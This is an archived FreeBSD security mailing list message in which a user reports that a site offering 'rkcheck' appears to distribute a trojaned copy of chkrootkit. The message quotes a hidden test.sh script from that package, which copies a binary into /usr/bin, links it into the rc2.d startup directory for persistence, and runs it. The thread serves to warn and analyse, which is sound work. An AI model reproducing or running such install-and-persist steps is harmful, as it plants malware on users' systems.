From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 21:07:27 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 1FF56D1C for ; Wed, 25 Feb 2015 21:07:27 +0000 (UTC) Received: from plane.gmane.org (plane.gmane.org [80.91.229.3]) (using TLSv1 with cipher AES256-SHA (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id CAA5C968 for ; Wed, 25 Feb 2015 21:07:26 +0000 (UTC) Received: from list by plane.gmane.org with local (Exim 4.69) (envelope-from ) id 1YQjAt-00078g-TX for freebsd-security@freebsd.org; Wed, 25 Feb 2015 22:07:20 +0100 Received: from dynamic34-29.dynamic.dal.ca ([129.173.34.203]) by main.gmane.org with esmtp (Gmexim 0.1 (Debian)) id 1AlnuQ-0007hv-00 for ; Wed, 25 Feb 2015 22:07:19 +0100 Received: from jrm by dynamic34-29.dynamic.dal.ca with local (Gmexim 0.1 (Debian)) id 1AlnuQ-0007hv-00 for ; Wed, 25 Feb 2015 22:07:19 +0100 X-Injected-Via-Gmane: http://gmane.org/ To: freebsd-security@freebsd.org From: Joseph Mingrone Subject: Re: has my 10.1-RELEASE system been compromised Date: Wed, 25 Feb 2015 17:07:05 -0400 Lines: 40 Message-ID: <864mq9ya2u.fsf@gly.ftfl.ca> References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> <86k2z5yc03.fsf@gly.ftfl.ca> <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com> <30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C@schulte.org> Mime-Version: 1.0 Content-Type: text/plain X-Complaints-To: usenet@ger.gmane.org X-Gmane-NNTP-Posting-Host: dynamic34-29.dynamic.dal.ca User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/24.4 (berkeley-unix) Cancel-Lock: sha1:0KpUGi2nr2K7RVN3xvtUdX2zHoQ= X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 21:07:27 -0000 Christopher Schulte writes: >> On Feb 25, 2015, at 2:34 PM, Philip Jocks wrote: >> >> it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org >> which was registered a few days ago and looks like a tampered version of >> chkrootkit. I hope, nobody installed it anywhere, it seems to execute >> rkcheck/tests/.unit/test.sh which contains >> >> #!/bin/bash >> >> cp tests/.unit/test /usr/bin/rrsyncn >> chmod +x /usr/bin/rrsyncn >> rm -fr /etc/rc2.d/S98rsyncn >> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn >> /usr/bin/rrsyncn >> exit Are you looking at the tarball from the "source code" link, http://rkcheck.org/download.php?file=rkcheck-1.4.3-src.tar.gz? % tar -xvf rkcheck-1.4.3-src.tar.gz x rkcheck/ x rkcheck/chkdirs.c x rkcheck/README.chklastlog x rkcheck/README.chkwtmp x rkcheck/chkutmp.c x rkcheck/chkrootkit x rkcheck/chkrootkit.lsm x rkcheck/check_wtmpx.c x rkcheck/COPYRIGHT x rkcheck/strings.c x rkcheck/ifpromisc.c x rkcheck/ACKNOWLEDGMENTS x rkcheck/chklastlog.c: truncated gzip input tar: Error exit delayed from previous errors. I don't see a /tests/ directory or any directory under rkcheck. Joseph